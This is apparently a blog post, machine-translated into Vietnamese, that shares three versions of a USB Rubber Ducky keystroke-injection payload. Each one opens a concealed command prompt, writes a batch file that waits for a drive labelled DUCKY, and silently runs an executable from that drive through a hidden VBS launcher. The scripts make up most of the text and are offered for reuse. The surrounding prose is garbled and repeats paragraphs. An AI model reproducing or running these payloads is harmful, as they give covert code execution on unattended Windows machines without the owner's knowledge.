Sau đây là một Playload Tôi đã được làm việc trên mà chờ đợi cho đến khi một ổ đĩa có nhãn "Ducky" được gắn kết. Tôi đã sử dụng một số mã midnightsnake trong tải trọng này.
Tên của các tập tin được chạy có thể được thay đổi để .exe, tôi chỉ có nó chạy một lô cho mục đích thử nghiệm. Các dòng mà nói "STRING BẮT ĐẦU% myd% \ myEXE.bat" là dòng mà thực hiện thực thi.
Sau đây là các tập tin thực thi được chạy sau khi "Ducky" ổ đĩa đã được gắn kết. Tất cả mọi thứ đang được chạy một cách vô hình, vì vậy bạn sẽ cần phải kiểm tra sự tồn tại của "Message.txt" mà có lẽ sẽ là "C: \ Windows \ system32".
Các bộ mã hóa hiện nay hỗ trợ các lệnh lặp lại, vì vậy chỉ nên là một vấn đề nếu bạn đang sử dụng một bộ mã hóa cũ. Mã hóa bây giờ cũng hỗ trợ không gian màu trắng trong kịch bản vịt, vì vậy chức năng đã được tách biệt với không gian màu trắng.
Trên đây là một phiên bản mới hơn của RunEXE từ SD tải trọng trong đó sử dụng phương pháp googleknowsbest cho việc tìm kiếm "Ducky" ổ đĩa, mà là di động nhiều hơn so với phương pháp các phiên bản trước. Phiên bản này sẽ làm việc trên tất cả các phiên bản Windows hiện tại. Ex ... XP, Vista, và Windows 7.
Sau đây là một mất trên RunEXE từ SD tải trọng, tôi nghĩ rằng kết nối micro SD nhanh hơn nó được sử dụng, nó chỉ có thể là tôi. Ở đây tôi đang sử dụng một đặc biệt cho vòng lặp trong đó sử dụng lệnh 'Vol' cho khối lượng thông tin. Tôi khá chắc chắn nó chạy trên hầu hết các hộp Windows, và là hợp lý chắc chắn nó chạy trên hầu hết các máy tính cũ. Lý do chính cho việc cải tạo là để loại bỏ một số vấn đề liên quan đến lệnh 'diskpart', mà nếu chạy trên một hộp quản trị không sẽ gây ra các kịch bản trước đó về cơ bản treo.
Tên của các tập tin được chạy có thể được thay đổi để .exe, tôi chỉ có nó chạy một lô cho mục đích thử nghiệm. Các dòng mà nói "STRING BẮT ĐẦU% myd% \ myEXE.bat" là dòng mà thực hiện thực thi.
REM Author: overwraith REM Name: RunEXE.txt REM Purpose: Run an executable file off of the SD card after it mounts. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 25 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %myd%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER
Sau đây là các tập tin thực thi được chạy sau khi "Ducky" ổ đĩa đã được gắn kết. Tất cả mọi thứ đang được chạy một cách vô hình, vì vậy bạn sẽ cần phải kiểm tra sự tồn tại của "Message.txt" mà có lẽ sẽ là "C: \ Windows \ system32".
REM Message.txt
echo Hello Wolrd!!! echo Hello World!!! > Message.txt
Các bộ mã hóa hiện nay hỗ trợ các lệnh lặp lại, vì vậy chỉ nên là một vấn đề nếu bạn đang sử dụng một bộ mã hóa cũ. Mã hóa bây giờ cũng hỗ trợ không gian màu trắng trong kịch bản vịt, vì vậy chức năng đã được tách biệt với không gian màu trắng.
REM Author: overwraith
REM Name: RunEXE_V2.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses googleknowsbest's slightly more portable method to find the "Ducky" drive. REM Encoder V2.4 REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI r DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:) ENTER STRING if Exist %DUCKYdrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DUCKYdrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER REM STRING EXIT REM ENTER
Trên đây là một phiên bản mới hơn của RunEXE từ SD tải trọng trong đó sử dụng phương pháp googleknowsbest cho việc tìm kiếm "Ducky" ổ đĩa, mà là di động nhiều hơn so với phương pháp các phiên bản trước. Phiên bản này sẽ làm việc trên tất cả các phiên bản Windows hiện tại. Ex ... XP, Vista, và Windows 7.
Sau đây là một mất trên RunEXE từ SD tải trọng, tôi nghĩ rằng kết nối micro SD nhanh hơn nó được sử dụng, nó chỉ có thể là tôi. Ở đây tôi đang sử dụng một đặc biệt cho vòng lặp trong đó sử dụng lệnh 'Vol' cho khối lượng thông tin. Tôi khá chắc chắn nó chạy trên hầu hết các hộp Windows, và là hợp lý chắc chắn nó chạy trên hầu hết các máy tính cũ. Lý do chính cho việc cải tạo là để loại bỏ một số vấn đề liên quan đến lệnh 'diskpart', mà nếu chạy trên một hộp quản trị không sẽ gây ra các kịch bản trước đó về cơ bản treo.
REM Author: overwraith
REM Name: RunEXE_V3.txt REM Purpose: Run an executable file off of the SD card after it mounts. Uses a slightly different verison of the drive finder code. REM Encoder V2.4+ REM Using the run command for a broader OS base. DEFAULT_DELAY 75 DELAY 3000 GUI R DELAY 1000 STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat STRING :while1 ENTER STRING for %%d in (A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T, U, V, W, X, Y, Z) do ( ENTER STRING for /f "tokens=6 delims= " %%i in ('Vol %%d:') do ( ENTER STRING if "%%i" EQU "DUCKY" ( set "DuckyDrive=%%d:" ) ENTER STRING ) ENTER STRING ) ENTER STRING if Exist %DuckyDrive% ( ENTER STRING goto :break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto :while1 ENTER STRING :break ENTER REM Continue script. STRING START %DuckyDrive%\HelloWorld.exe ENTER CONTROL z ENTER REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY. REM Delete vbs file if already exists STRING erase /Q invis.vbs ENTER REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up STRING copy con invis.vbs ENTER STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False ENTER CONTROL Z ENTER REM RUN THE BATCH FILE STRING wscript.exe invis.vbs DuckyWait.bat ENTER STRING EXIT ENTER
0 nhận xét:
Post a Comment